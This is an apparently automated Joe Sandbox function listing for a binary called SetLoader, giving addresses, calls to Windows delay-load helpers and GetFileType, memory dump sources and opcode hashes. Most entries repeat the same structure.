                                              Similarity
                                              • API ID: DloadProtectSection
                                              • String ID:
                                              • API String ID: 2203082970-0
                                              • Opcode ID: 0782be12cc914cb8e45a8e8e44739f3daf1b0efe8cfa245514661bd0ec0e262e
                                              • Instruction ID: a5bd7f3e903218dd58ac4c9bf3257b86503c05903e74b2aaa36237203d02a841
                                              • Opcode Fuzzy Hash: 0782be12cc914cb8e45a8e8e44739f3daf1b0efe8cfa245514661bd0ec0e262e
                                              • Instruction Fuzzy Hash: 02D01230A01B089DF365EB68ECAE7643293BB09708F951484B50FD6195C7F154C8968D
                                              Function 0061B288 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileType.KERNELBASE(000000FF,0061B18A,?,?,?,00000000,0061B662,?,?,00000000,?,?), ref: 0061B294
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: FileType
                                              • String ID:
                                              • API String ID: 3081899298-0
                                              • Opcode ID: 866da71ea29f175205344b2cea8b59d4e8df74a86532fc4defb359441ee0a935
                                              • Instruction ID: 6afb4bf65db7ec772e51a6d6a09cf46b8a7e5803d82a87ef93b18ac948b42186
                                              • Opcode Fuzzy Hash: 866da71ea29f175205344b2cea8b59d4e8df74a86532fc4defb359441ee0a935
                                              • Instruction Fuzzy Hash: 01C01238000104968E304A38D8494EC7323AE533A67B8A298D02889AA2C3338DDBFA01
                                              Function 0063067C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: f503ef8acfc14511c81c51a1dfccf4ca5a810a31c065fcfc9e6c6cb94efcb877
                                              • Instruction ID: a7fbf2942e19ee86d31aeae7fe006f4070d8bf907271dafde8afdd8a920f65fd
                                              • Opcode Fuzzy Hash: f503ef8acfc14511c81c51a1dfccf4ca5a810a31c065fcfc9e6c6cb94efcb877
                                              • Instruction Fuzzy Hash: 31B012D535C006FD321416445C23C3F024FD4C1B20731C93EF008C0040D8401C4900B5
                                              Function 006306E7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 9a9bd46e894fa02ad5df6049011976d2374c12050193d6053a3c842d562c93cc
                                              • Instruction ID: 8f323e3680bef9726b38a5658d72e7df205323b5713f287d21fe36903425f969
                                              • Opcode Fuzzy Hash: 9a9bd46e894fa02ad5df6049011976d2374c12050193d6053a3c842d562c93cc
                                              • Instruction Fuzzy Hash: 8EB012D535C002EC324852486D23C3F014FC4C5B10731C87EF40CC0140D8411C8E0171
                                              Function 006306F1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 308e812cd3ff2f9785d3dfc10a2db13aa1385a296626d49c5216930929c91089
                                              • Instruction ID: 51a7dbdbdec9c643c52e55aa4ca88a464709397d71301f6ca43719e71ff0538e
                                              • Opcode Fuzzy Hash: 308e812cd3ff2f9785d3dfc10a2db13aa1385a296626d49c5216930929c91089
                                              • Instruction Fuzzy Hash: A2B012D535C002EC324852986C23C3F024FD4C5B10731CC3EF00CC0140E8401C8D0171
                                              Function 006306FB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 705c4d8b75f0a4e04098cfa233c373c14ddc4b0cff883d438aeae243389502f7
                                              • Instruction ID: c50e9fa3f8d8e179cc34eb8b08891d8460e3b3325fc10e4430513e8f0666c43c
                                              • Opcode Fuzzy Hash: 705c4d8b75f0a4e04098cfa233c373c14ddc4b0cff883d438aeae243389502f7
                                              • Instruction Fuzzy Hash: 02B012E535C102EC324456485C23C3F014FC4C6B14731C83EF40CC0040D8401C495171
                                              Function 006306C9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 4ff536f46aa417867aa907ccc375bfd2379650af2d73d807d1c88fa65036ca1c
                                              • Instruction ID: ed839f8d379d42f42af601dc8f7265c6a401a3d4a883d7082375fc61cbf0e778
                                              • Opcode Fuzzy Hash: 4ff536f46aa417867aa907ccc375bfd2379650af2d73d807d1c88fa65036ca1c
                                              • Instruction Fuzzy Hash: 0DB012E935C106EC324452485C23C3F024FD4C5B10731C83EF00CC0140EC401C490271
                                              Function 006306D3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 7cd50c97778c106f109f9286e128381d3f5e8fc1b3805f63e7aa1aa1b2dc620b
                                              • Instruction ID: 474df4c382b3f0cdb828a952b896f4b3898d47b69e8f8a357aa458948d4a4468
                                              • Opcode Fuzzy Hash: 7cd50c97778c106f109f9286e128381d3f5e8fc1b3805f63e7aa1aa1b2dc620b
                                              • Instruction Fuzzy Hash: C8B012D535C103EC32485A486C23C3F014FC4C6B10731C83EF40CC0140D8401C8D4171
                                              Function 006306DD Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 07f46dc07ee1c521712af5e824634f43bdfef0f78e48d251adb809e2fd1edaf8
                                              • Instruction ID: 9db89445e82e3d5a30b7aca5c13173fe7ffcafe1b01118d7866924f36f2ce854
                                              • Opcode Fuzzy Hash: 07f46dc07ee1c521712af5e824634f43bdfef0f78e48d251adb809e2fd1edaf8
                                              • Instruction Fuzzy Hash: 66B012D535C142EC338852486C23C3F014FC4C5B10731C93EF00CC0140D8401CCD0171
                                              Function 006306A1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: c0a65b3f7ef469f9d89c1db7068ea19081071258c14fd6cf5a1f18a8fb66b463
                                              • Instruction ID: 7bab8d5bdd58704645d0232c25dd2bed66cdc9c4506de587ebab347c0312361e
                                              • Opcode Fuzzy Hash: c0a65b3f7ef469f9d89c1db7068ea19081071258c14fd6cf5a1f18a8fb66b463
                                              • Instruction Fuzzy Hash: 9CB012D536C102EC32445248DC23C3F025FD4C5B10731C93FF00CC0040D8401C4901B5
                                              Function 006306AB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 782e1951079851b91afdbdf4ce7551ee4b9b8aad357f11953e6fcc7edaf0e626
                                              • Instruction ID: 14222f8ac01d6d41665070773946400ed3ebc97cbbf66c92e44357e335d42518
                                              • Opcode Fuzzy Hash: 782e1951079851b91afdbdf4ce7551ee4b9b8aad357f11953e6fcc7edaf0e626
                                              • Instruction Fuzzy Hash: B6B012E935C202EC324456485C23C3F014FC4C6B10731C83EF40CC0140EC402C494171
                                              Function 006306B5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: f7f2f62f93856c6fd4149b462bf3fa3a906f9a36ce937261f18bb71af2366b76
                                              • Instruction ID: c93bff8cacd848908594f0d6a79949c38e9cb9d6b549000e9c50c40ef89d974a
                                              • Opcode Fuzzy Hash: f7f2f62f93856c6fd4149b462bf3fa3a906f9a36ce937261f18bb71af2366b76
                                              • Instruction Fuzzy Hash: 66B012E935C202EC338452485C23C3F014FC4C5B10731C93EF00CC0140EC401C894171
                                              Function 00630697 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 77df8b45d33c0bd15a50c66d82c9a6ea97febf3669a1fcd20943aa2a8a88b02d
                                              • Instruction ID: 3a6bef65975be216bb2bf7753700ef05045ddb3e8af26e658686e872f9f6dc3e
                                              • Opcode Fuzzy Hash: 77df8b45d33c0bd15a50c66d82c9a6ea97febf3669a1fcd20943aa2a8a88b02d
                                              • Instruction Fuzzy Hash: ACB012D535C002EC32445248DD23C3F015FC4C5B10771CA7EF40CC0040D8411C4A01B5
                                              Function 00630723 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 117d4619798efd87a9ef0c368f06505ef806d6eba45fd6405be1530e84b36d7e
                                              • Instruction ID: 8150f88d62e586d772aba177334f3dbdab2809b6d69d4575762c25289bb199db
                                              • Opcode Fuzzy Hash: 117d4619798efd87a9ef0c368f06505ef806d6eba45fd6405be1530e84b36d7e
                                              • Instruction Fuzzy Hash: 33B012D535D102EC324456585C23C3F014FC4C6B10B31C83EF40CC0080D8401C4941B1
                                              Function 0063072D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 63e6ab45ffa9e1fa781a63dc54a89719c384aec2479c3e6b642cfbc8072736db
                                              • Instruction ID: bc7bf423c067a3c392911c98119639bd8e97a27596b4067b47d0f9f785dd8121
                                              • Opcode Fuzzy Hash: 63e6ab45ffa9e1fa781a63dc54a89719c384aec2479c3e6b642cfbc8072736db
                                              • Instruction Fuzzy Hash: 55B012E535D102EC338453585C23C3F014FC4C5B10B31C93EF00CC0040D8401C8901B1
                                              Function 0063070F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
